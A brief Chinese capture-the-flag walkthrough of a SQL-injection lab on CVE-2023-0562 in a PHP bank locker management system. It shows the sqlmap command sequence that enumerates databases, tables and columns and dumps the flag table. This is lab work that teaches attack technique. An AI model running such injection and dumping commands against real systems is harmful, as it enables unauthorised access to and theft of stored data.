春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump

相关推荐
一拳一个娘娘腔17 小时前
【SRC漏洞挖掘系列】第13期:云安全与中间件 —— 站在云端的“上帝视角”
安全·中间件
信息安全失业大专人员17 小时前
零信任时代,802.1X 准入架构是否已成“明日黄花”?
安全·信息安全·安全架构·企业信息安全
2601_9594779117 小时前
Vatee平台平台运行稳定吗?
大数据·人工智能·安全
孟俊宇-MJY17 小时前
Pancake 智能合约开发与安全审计实战指南
安全·智能合约
小杍随笔18 小时前
【Rust 1.96.0 深度解析:让 Range 可 Copy、让断言更聪明、让 Wasm 更安全】
安全·rust·wasm
架构源启18 小时前
Spring AI进阶系列(13)- 安全最佳实践(进阶版):Prompt注入防护、数据泄露预防与合规审计实战
人工智能·安全·spring
信息安全失业大专人员18 小时前
工业控制系统(ICS/OT)网络安全架构
安全·web安全·架构
买大橘子也用券19 小时前
26软件系统安全赛-Fake Emotion(复盘)
python·深度学习·安全·网络安全
Cheng小攸19 小时前
实验九:防火墙安全认证和审计实验
开发语言·安全·php
星幻元宇VR19 小时前
VR心理骑行设备:心理健康教育的新型互动体验
科技·学习·安全·vr